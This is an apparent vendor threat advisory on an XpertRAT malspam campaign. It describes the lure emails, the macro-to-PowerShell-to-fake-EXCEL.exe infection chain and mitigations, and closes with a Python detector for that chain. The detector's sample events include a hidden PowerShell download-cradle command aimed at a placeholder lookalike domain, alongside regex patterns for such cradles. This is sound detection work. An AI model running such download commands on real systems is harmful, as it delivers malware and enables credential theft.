Author: Shashank Jain
1. Overview
From 9 to 16 September, Infoblox observed a malicious spam (malspam) campaign whose actors were impersonating an employee of the Dubai-based engineering and construction company Arar Infra Contracting LLC. The body of the malspam email attempted to lure its targets into opening an attached file carrying XpertRAT: a remote access trojan that has been around since 2011.
XpertRAT consists of a core component and multiple modules, all written in Delphi. Its remote access capability makes it popular among many cybercriminals. It is usually propagated via spam emails, but pirated media and fraudulent updates have also been used to propagate it.[1]
2. Customer impact
Upon infecting a machine and establishing remote access, XpertRAT can steal credentials and system information, including operating system versions and running processes, and communicate with command and control (C&C) servers to exfiltrate data, download additional malware components, and execute arbitrary commands.
3. Campaign analysis
The campaign continuously sent spam for almost an hour, and all emails contained the same urgently themed message, with subject lines that looked like inquiries about construction equipment, projects, and product names. The sender domain was spoofed; the emails appeared to be coming from an employee of Arar Infra Contracting LLC. The attachment’s name consisted of “PO” or “Specification” followed by a date or a random string.
4. Attack chain
The email attachment consists of an unsigned RTF (Rich Text Format) file with malicious VBA code. When the file is opened, the VBA code executes a PowerShell script to download the first payload from a malicious domain with a name that mimics ESET NOD32, a legitimate security product.
The first payload is a downloader, and it downloads a portable executable file, EXCEL.exe. The executable checks for an internet connection by pinging google.com, starts Internet Explorer, connects to a C&C server, and downloads a second payload, also named EXCEL.exe, which is the XpertRAT executable. XpertRAT then uses NirSoft utilities to collect credentials and read personal data from the browser.
5. Vulnerabilities and mitigation
XpertRAT is equipped with functions that make it a prolific stealer of credentials and other information. Infoblox recommends the following methods for detecting, preventing, and mitigating XpertRAT attacks:
- Install and run advanced antivirus software that can detect, quarantine, and remove malware.
- Be cautious of emails from unfamiliar senders, and inspect attachments before opening them.
- Develop traffic rules that can block outbound access to potentially malicious endpoints according to domains or unique URI parameters.
- Implement PowerShell logging to detect any anomalous or malicious use.
- Install strong email security solutions to detect emails with suspicious content.
- Install system and application updates as soon as they become available.
- Do not enable editing or macros in Microsoft Office attachments, especially for files whose only apparent contents are directions for enabling editing or macros.
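The attack chain in section 4 and the PowerShell-logging recommendation above translate into a small set of endpoint detections. The following added example (written for this advisory, not Infoblox's or any vendor's tooling) runs those rules over constructed process-creation events; the lookalike domain, file paths and process IDs are placeholders, not indicators from the campaign.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real
# telemetry. They mirror the advisory's chain: Word opens the RTF, the VBA macro runs
# a PowerShell download cradle against a lookalike domain, the dropped EXCEL.exe pings
# google.com and launches Internet Explorer. Domain and paths are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\PO-20210914.rtf"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://eset-nod32-update.example/a','C:\Users\u\AppData\Local\Temp\EXCEL.exe')"},
    {"pid": 102, "ppid": 101, "image": r"C:\Users\u\AppData\Local\Temp\EXCEL.exe", "cmd": "EXCEL.exe"},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\PING.EXE", "cmd": "ping google.com"},
    {"pid": 104, "ppid": 102, "image": r"C:\Program Files\Internet Explorer\iexplore.exe", "cmd": "iexplore.exe"},
    {"pid": 105, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "cmd": "EXCEL.EXE"},
]

OFFICE_BINARIES = {"winword.exe", "excel.exe", "powerpnt.exe"}
OFFICE_DIR = re.compile(r"^c:\\program files( \(x86\))?\\microsoft office\\", re.I)
DOWNLOAD_CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|bitsadmin", re.I)
SECURITY_LOOKALIKE = re.compile(r"https?://[^\s'\"]*(eset|nod32)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_alerts(events):
    """Return (rule, pid) pairs for events matching the advisory's attack chain."""
    by_pid = {e["pid"]: e for e in events}
    masquerading = set()
    alerts = []
    for e in events:
        child, parent = basename(e["image"]), by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        # An Office application spawning PowerShell is how the VBA macro starts the chain.
        if parent_name in OFFICE_BINARIES and child == "powershell.exe":
            alerts.append(("office_spawns_powershell", e["pid"]))
            if DOWNLOAD_CRADLE.search(e["cmd"]):
                alerts.append(("powershell_download_cradle", e["pid"]))
            if SECURITY_LOOKALIKE.search(e["cmd"]):
                alerts.append(("security_vendor_lookalike_url", e["pid"]))
        # A binary named like an Office app but running outside the Office install path.
        if child in OFFICE_BINARIES and not OFFICE_DIR.search(e["image"]):
            masquerading.add(e["pid"])
            alerts.append(("office_name_masquerade", e["pid"]))
        # Connectivity check (ping) and browser launch from the masquerading dropper.
        if e["ppid"] in masquerading and child in {"ping.exe", "iexplore.exe"}:
            alerts.append(("masquerade_spawns_" + child.split(".")[0], e["pid"]))
    return alerts
```

The benign EXCEL.EXE under the Office install path (pid 105) raises no alert, which is the distinction that keeps the masquerade rule usable in production.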